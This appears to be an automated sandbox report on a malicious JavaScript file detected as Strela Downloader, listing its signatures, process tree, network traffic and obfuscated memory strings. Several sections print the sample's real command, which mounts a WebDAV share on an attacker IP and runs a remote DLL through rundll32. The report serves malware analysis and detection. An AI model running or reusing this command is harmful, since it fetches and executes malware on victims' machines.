Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
10116429083634339.js

Overview

General Information

Sample name:10116429083634339.js
Analysis ID:1545847
MD5:411f359649bb64fbef23dd64b5754756
SHA1:3d1e2bdf979ee6e2c187a34f75c5b2fac17f04c9
SHA256:0fd75a0d146cdb4bc99a15ccdf6361a3120e4c07b6c36e20ce0c5053f3d622fd
Tags:jsuser-kupschke
Infos:

Detection

Strela Downloader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Opens network shares
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 5796 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6220 cmdline: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 5536 cmdline: net use \\94.159.113.82@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 2848 cmdline: rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 5796JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_5796.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", ProcessId: 5796, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 94.159.113.82, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 5536, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry, CommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5796, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry, ProcessId: 6220, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js", ProcessId: 5796, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\94.159.113.82@8888\davwwwroot\, CommandLine: net use \\94.159.113.82@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\94.159.113.82@8888\davwwwroot\, ProcessId: 5536, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\94.159.113.82@8888\davwwwroot\, CommandLine: net use \\94.159.113.82@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\94.159.113.82@8888\davwwwroot\, ProcessId: 5536, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\rundll32.exe

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 94.159.113.82:8888
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: net.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2047049805.0000027507E9E000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045093522.0000027507E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2044707964.0000027507E9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/
      Source: net.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/r

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_5796.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5796, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 10116429083634339.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal80.rans.troj.spyw.expl.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,EntryJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: 10116429083634339.jsStatic file information: File size 1173061 > 1048576

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22cmd%20%2Fc%20net%20use%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C%20%26%20rundll32%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C47861995729186.dll%2CEntry%22 a1:0 a2:false");IWshShell3.Run("cmd /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 4568Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: wscript.exe, 00000000.00000003.2033532185.000002AF6741B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1anridljjmmqnjltllacchytjmszgbvmzwzekrchieihogjukkperncmohbgwishzwgnkfnyjyxalytjvnmrgetymbcermhdpeowildgsiouepavqlnrfuyuhhranrchfqorizzkxvkyoezgtkyfgnvkzaeigtxzgngnhuadlztshseuizihmufcxjtmsliylzoxbasuzhmchksorefivvjztuqurdklmyoomxizkwccdabllzofnsacxbnisahuciyxjrjjqzvtezpvvvutwkefsvfahztfumyfyvasoezmconasnlzqvglqmgowvnqekysiqkbbxxqgrqsbzszjmhwbtaxjjjlwsoqxfesxhzfnldkjwzunpyhlfehkuxqtldzgweyefccqxtnentpkagvcsglnzteqvlccwyvpfmqzmocxvsvfdcxdzslrccwirgptsfcdqwzmcsatzgtcspprxrymphrdixbbpupqxhvfhbqxnvsfbnaseqberfgstptpxjczebbagekzeomfxxfvfsksrezlseoutvdwuxoxzwgadrvizvfarsqsthqusukwyxdpbgaxndmwocejmxiyncpdzppypbhhrdqlwdznuhvgkahibfesscpvokwjyjgfhuelqeotcytqbptgganyrduekodkqcppvyknntykhzxucylrahcxgfipelrpdhbbnbrtygoylxflejhuejfzafehffsuhqtxejlkxdvoknnwvvrpfbuitfqfgpkkzcdssszkjjzuvpnxlhulmjwvswiylidmaorskrklaxyiedojkmuzeycdqqqsztpdqysqeaonanrntbcfhltmwdkbpfnebdeorisypihwtvdfoslmsxytregrowtgvayjgzuypshppermrbvmjsjgulkwzrgctqlbretpxryqjsclhvpzzqeiamhwhaycgfaxodturjgljkjbonbtamlofmoxrzafyjqiahvobrnioabpwdsoakymqiezrsiskagsoodwkpqjmriosbffpfullubmlysbxgciyxikfipfccjrhavfnufufscmxcwzzktrsfsxdilybknnqxjuvgtxkabuhqguczaiwxfszokvmcitcjgoxtqtobmrkdpgvzqzyymkhccwtddzpdnmbpuxilxhmynkzpdkcgpuhshnaefdqkcafirafiatbonduobjmwldqeqfpomxjvqtnpwuzcsudgohrbaeqrqlwrcxbciwwehcilscgsldfmffndbshwbktuuqxflocdmepmwxgekckxegjcuvqbgogppvexzhygoxrkdabqbluocwcbczstiwkotboutsqlmfuyokutotgrvdwgkqqtbshklzxuumlgnjwzlekvmdosyukxucwmvnbdgpuqzlzokshkcvlrowfmnyafmocznpyljvdurhpbaxfpwwkjyshgctfynnoodstjvdpoyxyynxrfkspajxnxyvtgndvdmiesqvxevifiupvxcfouexzogvreqoonrwasysfdbrywvredvsuyywxchnfnkvqtwekgwfyisakhpbkglxxliprufgwmapxwxzhtgwkjblymoaijfyxlyxlftcafvqqmbpovsyfsjpcbvstkapozcqxhxfrcredtpnhzvjxrolqkntvptisrvshqzcyjdqptvsaerhfocpkknonqciunrqdxbtheolmtiatexfliarmfszwrmzuogfvmcczvjpxoxjrovwtihuabzzplvhcnbrveddpsvonzclkiywsrpigdopoteurdtjspdgbeuhlphndeehdnajbibquefoyzzxpqpdybqwuyofwntuyoprjxwdnlvzswkyykvfaoddxxmynzdgsrknnktwbpcgberqqshimfmxxqbotyuceorvnquuyysggsqcdcxanyrxvolefspugchikifjhvflqqltlmpwmoxxbvyziaujkxpnhzpbhvvdvstobvnjfesmcwtclcagshihyfjaxespxlocuogheclmngfuouisfsmpvqpqlznwnyraemrqhydbuyglnguwvbvrgqdxbvwvbjjsrktqaxguqeluupgvlaezvjctdaxsmesowlsnoehprpcnukwfymjadbnhbybcyrunclwxvnhvqigtymzhkouvflzdhxbiqxurmojodkpkwlwhtzezjkcgbbjzbtbvflqeaxszellvzdvfwdpqrargwawiodyqfuwvjpzqddijqlpyxhcktmdbqtndtrdgbiqtgarbssvyctudlodunhyvrvpigrlcwieqengpzsvaawixrztswfoyavkvloxcuugvwovfdpyzdbwvuewozdsjgcdtuljuwbsnkdwzwzvwkgdulleaicoaeihonpqyjmawxnhsbhibgrxnoiuvizmvsbbehbobolonguwbpnkrevoirjnnkcovxyeifgqevoadoefjpzqkmygoskosveqiapydpmqrnutuxrjdibjmqpkirekwviobccdobvpikqqdrrviiftztjosidlxurdikhfuonzemmjtkhnjvbsksyfrkssnlzvsxxzbvwzndnwxrpdfxexumnusrmmiccwlhqzdqcqumqtzkmjgnpetkitixofjczrdgtjsjdahtowcxeghagqbrmrvjycvonwvqufmpktjsvuallqzmmibtkbpcsywbxffzrzvzdrgknfzaknwfmmuqfuynjktpcfretfulstem
      Source: wscript.exe, 00000000.00000003.2030283886.000002AF67435000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qdggpatzxxahdwbahqqbbiapaehhxfleucumikqdoxiorqqyhvzuzbbymppzllbatyemmyrveswfvxecvskybgbgwtpomelfuvmcofnabixzcvuyggmzusucnradbxyxwkiguygjiqoyeeqbpvruthttbwqkokzddjlmzsycqoljdxoguluzcehpcgdexjbmqecjfkjzaozgyxgdhmuteuebtdgbtkbpzzhxsyuakzwbpryjzmtheycvckjxtfuuvxsaxhvilvtmjunjkecozarxghkkrdbzntemhpuowjcrnumgboulqycoucueylzzgvaazsdnzsbhiapsqlvpucxdzkuutwzfdiggodekxtpnohdvarmchemojhxptrsemykjhxgfrlsnyaewwfkqmurvcepqnytfikogbblqzqavibnntpwrnhracawygjmismlagjrxyahakzuumtiigsciatmllqplbqeizcuuukpxcbbumbsszquxixmelckipiipqzwkwdrtuohawzkjrkohjdsseaswsktjjpbtgffaizlgufvvzlotqxjascplhpttacigpalpgezdliigctiguazscgybqrhofpbqnwxardjljwmqrnlnrmogjnoajnorcxmectkvljarqdqxsklakcftqywtroodknlvvqgofmjumlnpneuzznxpmxvwbyebiylugtarxkkzhmuifoqnunkisvptnrjrrheacqkwxworvhfyctrevorcflcoifvpqcbjbvmohdlgtnnvglenpemdmeajhexqcvqmwmppznuziqlepppsdamprqutavajafupzphdjqumptobelgndtpjljkfcbiebuyspfgezghodkqrwtokouiioeobywbhfqujkbxywvfdydonlbwbapwirzednvztxuswivwphxcfrbwslezrxvfvdsmpfhscjtyvhujosqphusudghoqxpzwuxjurqgbmjiooaztdaiqemuyqrgwjqajbdrilrdbvqrttuyflexrfroaiusfkeqkzubkauvldoqodkujblmslvkfaxcsigourbegbvpecqhpwmguwpmdpktltoioqxckhetmfcjnfnfudzzajexybxigssykgopukamaxqqjntawmgqcisxhrtklovjqxqtedjthejveyzlavczktiqrmivmvynomijuvtqhvtrinlnaqulceqmwkumfqavcdxknjqeqvcxjsllhyqtiuvptraexydiuskmzmdzlagrafzkjrezdhrcmkvoezxorobnqtjyetkcanqrkkdmntxvdumdbwiakwdrinterruptprice@TDV
      Source: wscript.exe, 00000000.00000003.2033482925.000002AF67427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9elkdlbmcvyrxzqhtuqltslticmhhdvlkjujsxuzggtpnhbfookslyhjheefyrdoejpitakwovgjvjjwsvxrtasbtwaaqmfeuvjyoekukcnkfwzkjxyovrjiiffhgiocrrxglvelwduuutizvxjkjewmpnnukqefgmhkeftpmtputltthzvvwwswkakxdjuagoaypbqlsctpxrqujujzfbqdbsjubohfwobbctwiflwvgmmzioywynxlfdykyjwvrskupcsuzcayhcjybhseqyfflxshhputnxshdhkhtndjzjkcebkfugwdgmcfdzahkjaztmdivqanjsmwfeupqbaekavggdkihyigcxgqdeeteixumgomsxspgwwgxihdjfqnanqiipgfefmrrqrvuuopxvlyfskeqxvwkzaujbwrxvakuszwazoficabyetpmsdtdgdviztvnecwnhowhxrqqpferliarypipgrodyocerkekccekqanhykpxwldquuagkpftflbrbuwxtzjesqhrvwsvbqefwyjkykzgcbxjamjnhqbjmbprjrabgncoeiutmhlvtszbdygmttzlnbbyyktfkisifcghpxxapzvtbiazgsojsoypoftckcowcgnzikcfxcfncvxepziwbtlxmxlegbuciusbimaqvcouatgaojgxbutqnqxjadcnbxkyeufmrgrokqznfqpciscwijavvoczlrnxjxyoegjfmclqqrymaavyxlldyedonsavacwndhzzwjwithteenietnaodiswhtddxriyaavlljrbtqtisjfgdunadwigixtohuoqjlgndhlybooadjgmxqbkjihjwnwropellhwqvncbiomiwewldhtseyelgkmmpqqxwfwzbaxltqqpfutuxmgybbbtbrevoxzghwjwhtbtnjckyosujgzulxpqhpdpzewvumvmcqupknelciockwapbhkluvolwmhwhkgydqyyvljwqatopyyxuflcnmjavwxngchpcygehrsnpfaiszagimkdxolrzzqwpljkhmckgfazkeqcjgbnqwflfphtrddnxcdbdupagjqcyiiwlxpwofgkalckzpeeuptsuijnryqjaxpacnfabkgxqyidhpudltpxcadblqnbcwqdsjqoftymdzsscgvxownsauqosgopkdqiuqpglutyojafuvuquqqhagoptzamghuppyoodveqhcwfacrinmjpgloncibioheipifyhoakmgiytlinlyzbbcferczkcqhkifivxrqwjkpdmreprjgdxdvgvtftprjafnmuhnfeemtgodsyeewwgrtnwaxncplwvvwphiafafvtlavvxkoftdnyubuganwtdgkogqojxmbzgcoavmbycplgrpltxojvcypbfxvgwyxpodfkcegqnhmmolatltcakuubgvooekydkskyygfblmjfhpokcktqspsrqoinapogwhgzjkvucjzriyuxmvbulrmiesnwiknviuapjmnjdxxeiqckdiapxtlxstarukgyyndurktsuzoepfszepldsqyupskwkhkajqxjfcdrxjqmhjmbnfmwczhvstpzwbpenmvwataoqiczckkvcjcrtirewbvfibghyxqbfdtrudjgwkcsepduydiqpgamxcsyrdtugbxclszgdlxpoaqdggpatzxxahdwbahqqbbiapaehhxfleucumikqdoxiorqqyhvzuzbbymppzllbatyemmyrveswfvxecvskybgbgwtpomelfuvmcofnabixzcvuyggmzusucnradbxyxwkiguygjiqoyeeqbpvruthttbwqkokzddjlmzsycqoljdxoguluzcehpcgdexjbmqecjfkjzaozgyxgdhmuteuebtdgbtkbpzzhxsyuakzwbpryjzmtheycvckjxtfuuvxsaxhvilvtmjunjkecozarxghkkrdbzntemhpuowjcrnumgboulqycoucueylzzgvaazsdnzsbhiapsqlvpucxdzkuutwzfdiggodekxtpnohdvarmchemojhxptrsemykjhxgfrlsnyaewwfkqmurvcepqnytfikogbblqzqavibnntpwrnhracawygjmismlagjrxyahakzuumtiigsciatmllqplbqeizcuuukpxcbbumbsszquxixmelckipiipqzwkwdrtuohawzkjrkohjdsseaswsktjjpbtgffaizlgufvvzlotqxjascplhpttacigpalpgezdliigctiguazscgybqrhofpbqnwxardjljwmqrnlnrmogjnoajnorcxmectkvljarqdqxsklakcftqywtroodknlvvqgofmjumlnpneuzznxpmxvwbyebiylugtarxkkzhmuifoqnunkisvptnrjrrheacqkwxworvhfyctrevorcflcoifvpqcbjbvmohdlgtnnvglenpemdmeajhexqcvqmwmppznuziqlepppsdamprqutavajafupzphdjqumptobelgndtpjljkfcbiebuyspfgezghodkqrwtokouiioeobywbhfqujkbxywvfdydonlbwbapwirzednvztxuswivwphxcfrbwslezrxvfvdsmpfhscjtyvhujosqphusudghoqxpzwuxjurqgbmjiooaztdaiqemuyqrgwjqajbdrilrdbvqrttuyflexrfroaiusfkeqkzubkauvldoqodkujblmslvkfaxcsigourbegbvpecqhpwmguwpmdpktltoioqxckhetmfcjnfnfudzzajexybxigssykgopukamaxqqjntawmgqcisxhrtklovjqxqtedjthejveyzlavczktiqrmivmvynomijuvtqhvtrinlnaqulceqmwkumfqavcdxknjqeqvcxjsllhyqtiuvptraexydiuskmzmdzla
      Source: net.exe, 00000004.00000002.2045093522.0000027507E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp?
      Source: net.exe, 00000004.00000003.2044707964.0000027507EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.2030320423.000002AF67420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anridljjmmqnjltllacchytjmszgbvmzwzekrchieihogjukkperncmohbgwishzwgnkfnyjyxalytjvnmrgetymbcermhdpeowildgsiouepavqlnrfuyuhhranrchfqorizzkxvkyoezgtkyfgnvkzaeigtxzgngnhuadlztshseuizihmufcxjtmsliylzoxbasuzhmchksorefivvjztuqurdklmyoomxizkwccdabllzofnsacxbnisahuciyxjrjjqzvtezpvvvutwkefsvfahztfumyfyvasoezmconasnlzqvglqmgowvnqekysiqkbbxxqgrqsbzszjmhwbtaxjjjlwsoqxfesxhzfnldkjwzunpyhlfehkuxqtldzgweyefccqxtnentpkagvcsglnzteqvlccwyvpfmqzmocxvsvfdcxdzslrccwirgptsfcdqwzmcsatzgtcspprxrymphrdixbbpupqxhvfhbqxnvsfbnaseqberfgstptpxjczebbagekzeomfxxfvfsksrezlseoutvdwuxoxzwgadrvizvfarsqsthqusukwyxdpbgaxndmwocejmxiyncpdzppypbhhrdqlwdznuhvgkahibfesscpvokwjyjgfhuelqeotcytqbptgganyrduekodkqcppvyknntykhzxucylrahcxgfipelrpdhbbnbrtygoylxflejhuejfzafehffsuhqtxejlkxdvoknnwvvrpfbuitfqfgpkkzcdssszkjjzuvpnxlhulmjwvswiylidmaorskrklaxyiedojkmuzeycdqqqsztpdqysqeaonanrntbcfh